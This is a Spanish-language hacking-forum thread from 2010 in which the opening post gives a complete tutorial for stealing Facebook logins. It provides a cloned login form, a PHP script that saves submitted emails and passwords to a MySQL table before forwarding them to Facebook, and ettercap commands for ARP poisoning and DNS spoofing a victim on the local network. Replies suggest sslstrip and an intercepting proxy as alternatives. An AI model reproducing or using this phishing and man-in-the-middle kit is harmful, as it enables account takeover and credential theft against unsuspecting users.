Título: fakeFacebook Publicado por: dazoverride en 20 Diciembre 2010, 04:46 am Vamos a crear un servidor LAMP, y falsear facebook (mientras la victima piensa que entra en facebook, en realidad entra en nuestro servidor apache) para que al ingresar las contraseñas queden grabadas en nuestra base de datos, tambien deberemos hacer un dns_spoof a la victima...
Sirve para cualquier web cambiando un par de parametros pero el ejemplo lo he hecho con facebook 1- Instalamos la base de datos: sudo aptitude install php5 mysql-server libapache2-mod-auth-mysql php5-mysql phpmyadmin 2- Descargamos el phpMyAdmin lo descomprimimos y lo metemos en /var/www/ 3- Configuramos la base de datos y creamos una base de datos llamada XXX con una tabla Passwords con tres campos que seran id, user, pass Bien ya tenemos la base de datos configurada, ahora un poco de php. 4- Copiamos el index de facebook y lo metemos en nuestro servidor web, /var/www/index.php En este archivo debemos cambiar el action del <form id="login_form"> Citar <form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="NLumB" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="es_ES" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Correo electrónico</label></td><td class="html7magic"><label for="pass">Contraseña</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" />................. debemos poner este php como action dejando igual todo lo demas--> form method="POST" action="insert_into.php" 5-ponemos este insert_into.php en /var/www/ Citar <?php Bueno, por fin lo tenemos todo preparado, solo nos falta la ayuda de ettercap. $conn=mysql_connect("127.0.0.1","userBaseDeDatos","passBaseDeDatos"); $err_db=mysql_select_db("XXX"); $usuario=$_POST['email']; $contra=$_POST['pass']; $sql="insert into Passwords (user, pass) values ('$usuario', '$contra')"; if ( ! $resul=mysql_query($sql,$conn)) { exit; } mysql_close(); //header ("Location: https://login.facebook.com/login.php?login_attempt=1"); ?> <html><head></head><body> <form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"> <input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є"> <input type="hidden" name="lsd" value="LzdnF" autocomplete="off"> <input type="hidden" id="locale" name="locale" value="es_ES" autocomplete="off"> <?php echo '<input type="hidden" class="inputtext" name="email" id="email" tabindex="1" value='.$usuario.'>'; echo '<input type="hidden" class="inputtext" name="pass" id="pass" tabindex="2" value='.$contra.'>'; ?> <!--<input value="Entrar" tabindex="4" type="submit"> --> <input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є"> <input type="hidden" id="lsd" name="lsd" value="LzdnF" autocomplete="off"> <script language="javascript" type="text/javascript"> <!-- document.getElementById('login_form').submit(); //--> </script> </form> </body></html> 6-Configuramos el /usr/share/ettercap/etter.dns y ejecutamos ettercap Citar sudo echo *.facebook.* A TuIP > /usr/share/ettercap/etter.dns sudo echo www.facebook.* A TuIP >> /usr/share/ettercap/etter.dns sudo echo www.facebook.com A TuIP >> /usr/share/ettercap/etter.dns sudo echo www.facebook.es A TuIP >> /usr/share/ettercap/etter.dns sudo ettercap -T -q -i eth0 -M arp:remote -P dns_spoof // /ipRouter/ Bueno... vaya sermón he soltado.... Espero que sirva para aprender y disculpad que no me explique muy bien :S SALUDOS!!!! Título: Re: fakeFacebook Publicado por: dvdr en 20 Diciembre 2010, 11:19 am yo soy un poco torpe bueno bastante torpe ....esto lo puedes poner con imagenes de cada paso y aparte como lanzarlo
en el 2 paso ya me perdi porque lo e cojido de synaptyc ...¡¡¡talvez no lo deberia aver cojido de hay salu2 nose cual es el apropiado http://www.phpmyadmin.net/home_page/downloads.php Título: Re: fakeFacebook Publicado por: fujiyaro en 23 Diciembre 2010, 02:00 am Esta bien y muy currado, pero a mi parecer es más fácil hacerlo sin necesidad de montar un servidor i acer un dns_spoof.
Con el mismo ettercap y sslstrip puedes montar un arp_poisoning y para tu fin te dara el mismo resultado, pero más fácil y commutable con todas las web. PD: me gusto tu sistema. Título: Re: fakeFacebook Publicado por: dvdr en 23 Diciembre 2010, 10:47 am si funciona pero porlo visto dicen que tiene un faenon explicarlo paso a paso
lee pedido al aguien que lo haga y me a dicho eso ...asi que si alguien se anima se lo agradeceria salu2 Título: Re: fakeFacebook Publicado por: dazoverride en 24 Diciembre 2010, 16:21 pm Esta bien y muy currado, pero a mi parecer es más fácil hacerlo sin necesidad de montar un servidor i acer un dns_spoof. Gracias :D :PCon el mismo ettercap y sslstrip puedes montar un arp_poisoning y para tu fin te dara el mismo resultado, pero más fácil y commutable con todas las web. PD: me gusto tu sistema. Haber si, está claro que con un simple ettercap + sslstrip seria más fácil y mas rápido, pero el camino difícil es más divertido, y no se... ademas fue una idea que se me ocurrió y pues ahora que tengo un nivel de programacion mas alto pues me dió por hacerlo y ya que no he aportado nada mas que tonterias por aquí pos me apetecia subir algo decente... No se, quiza no me he explicado muy bien, pero vamos, que está el codigo del index.php y el insert_into.php que creo que es lo mas "difícil", la verdad. yo soy un poco torpe bueno bastante torpe ....esto lo puedes poner con imagenes de cada paso y aparte como lanzarlo ufff... que dolor a la vista, porfavor... es el primer enlace que te da google si pones phpMyAdmin!!!!!!! y si no sabes cual poner buscalo en google... ademas he puesto como se instala el LAMP y todo, no se la verdad esque me esperaba cualquier pregunta menos esa.... Esque me siento ofendido enserio... XDen el 2 paso ya me perdi porque lo e cojido de synaptyc ...¡¡¡talvez no lo deberia aver cojido de hay salu2 nose cual es el apropiado http://www.phpmyadmin.net/home_page/downloads.php Mirad he publicado esto para que podamos aprender todos, no para sacar passwords de facebook, el fallo es mio por llamarlo asi..... Título: Re: fakeFacebook Publicado por: dazoverride en 24 Diciembre 2010, 16:37 pm Por cierto haber si alguien me soluciona el problema :P tiene un pequeño fallito el procedimiento :P
La questión es... hago el dns_spoof para que vaya a mi servidor en vez de a facebook real, con la copia de facebook o lo que sea, pero al hacer el dns_spoof, la víctima se queda en mi servidor y no puedo redirigirlo al facebook real :P ya que se me queda spoofeado en mi servidor y de ahí no sale jajaj vamos que una vez spoofeado no me deja ir a facebook. Alguna solución? A mi lo único que se me ocurre es reenviarlo a un html con un mensaje de error y avan.... pero ya pierde la gracia porque no te redirije al facebook logueado... Título: Re: fakeFacebook Publicado por: sclub en 24 Diciembre 2010, 16:56 pm Ui!!! Daz por aquí!!! Cualquiera diria que te conozco.... xD
Pues a mi se me ocurren dos formas, una seria modificando el etter.dns al vuelo y volver a lanzarlo desde el archivo php una vez ya tienes los datos en tus variables. Y la otra, seria utilizando una aplicación que encontré el otro dia entre mis favoritos(xD), beefyproxy (http://www.hakim.ws/software/beefyproxy/). No la he probado aun, pero la explicación es bastante clara: Citar BeEFYPROXY es la unión de dos scripts que juntos permiten interceptar y re-enviar contenido modificado de sitios verdaderos aparentando ser el sitio original. Se requiere de apuntar los dominios al IP donde esta hosteado BeEFYPROXY.BeEFYPROXY esta diseñado para correr en un hosting dedicado para que la dirección IP muestre la pagina default de BeEFYPROXY.Se recibe una conexión a la dirección IP y el script toma el valor de la cabecera Host y obtiene la pagina del Host verdadero y agrega el script del cliente BeEF. (Esta app salió de un user del foro... pero no recuerdo quien fue... ;))Nada pues, suerte con eso y ya me contaras! :laugh: Título: Re: fakeFacebook Publicado por: dazoverride en 24 Diciembre 2010, 16:59 pm Ui!!! Daz por aquí!!! Cualquiera diria que te conozco.... xD Pues a mi se me ocurren dos formas, una seria modificando el etter.dns al vuelo y volver a lanzarlo desde el archivo php una vez ya tienes los datos en tus variables. Y la otra, seria utilizando una aplicación que encontré el otro dia entre mis favoritos(xD), beefyproxy (http://www.hakim.ws/software/beefyproxy/). No la he probado aun, pero la explicación es bastante clara:(Esta app salió de un user del foro... pero no recuerdo quien fue... ;)) Nada pues, suerte con eso y ya me contaras! :laugh: jajajaj!!! vale... pos entonces me lo explicas en clase? jajajajaj No enserio buena idea aora mismo lo pruebo aiva!! lo acabo de mirar y.... muy buena info :P aqui esta el post completo http://foro.elhacker.net/analisis_y_diseno_de_malware/beefyproxy_mitm_web_con_modificacion_de_contenido-t252828.0.html Título: Re: fakeFacebook Publicado por: dvdr en 25 Diciembre 2010, 13:13 pm Citar ufff... que dolor a la vista, porfavor... es el primer enlace que te da google si pones phpMyAdmin!!!!!!! y si no sabes cual poner buscalo en google... ademas he puesto como se instala el LAMP y todo, no se la verdad esque me esperaba cualquier pregunta menos esa.... Esque me siento ofendido enserio... XD la verdad no se aque viene tu mosqueo porque lo busque en google y medio ese y 300mil mas pero en fin gracias a tu aporte estoy estudiando html y php salu2 y funciona, pero solo en lan cita:algunas pernonas nesesitamos que nos expliquen las cosas como a los niños chicos ;-) Título: Re: fakeFacebook Publicado por: 177600531 en 25 Diciembre 2010, 15:50 pm la verdad no se aque viene tu mosqueo porque lo busque en google y medio ese y 300mil mas pero en fin gracias a tu aporte estoy estudiando html y php salu2 y funciona, pero solo en lan cita:algunas pernonas nesesitamos que nos expliquen las cosas como a los niños chicos ;-) Pues ya te vale, si no entiendes una cosa tan básica como esa además de que te lo dan masticado en el plato, el problema es que hay mucha información con video Tutoriales y muchas fotos y luego cuando os ponen un tutorial sin fotos ya estáis todos llorando. Título: Re: fakeFacebook Publicado por: dvdr en 25 Diciembre 2010, 19:19 pm puesno no nose pero ago otras cosas que tu soñarias poder hacer
"mas importante que saber hacer, es saber lo que haces" ;D WebMaster >:D Título: Re: fakeFacebook Publicado por: 177600531 en 25 Diciembre 2010, 21:00 pm puesno no nose pero ago otras cosas que tu soñarias poder hacer "mas importante que saber hacer, es saber lo que haces" ;D WebMaster >:D Pues si no sabes hacer una cosa tan básica y estas lloriqueando por aquí que te lo tienen que explicar como a los niños y pidiendo fotos poco veo que sepas hacer, aquí es cuando todos demostramos lo que sabemos y lo que no y tú pues como que no llegas a mucho de todas formas sigue pensando que yo llegaría algún día a envidiar tu estúpido conocimiento. Edito: Es suficiente que miren tus faltas de ortografía para que entiendan cuanto sabes y cuanto desearía alguien del foro llegar a ser tú, teniendo en cuenta que lo primero que se aprende es a escribir. ;) Título: Re: fakeFacebook Publicado por: RedZer en 25 Diciembre 2010, 21:11 pm ya nenas luego se arrancan el calson :¬¬
Título: Re: fakeFacebook Publicado por: dvdr en 25 Diciembre 2010, 21:36 pm no te bajes del burro que ya me bajo yo asta luego lucaaaaaaaaaaa
(http://img836.imageshack.us/img836/5982/pantallazomp.png) aprender de verdad y no ser un simple lammer q solo sabe hacer un xploit de cuarta |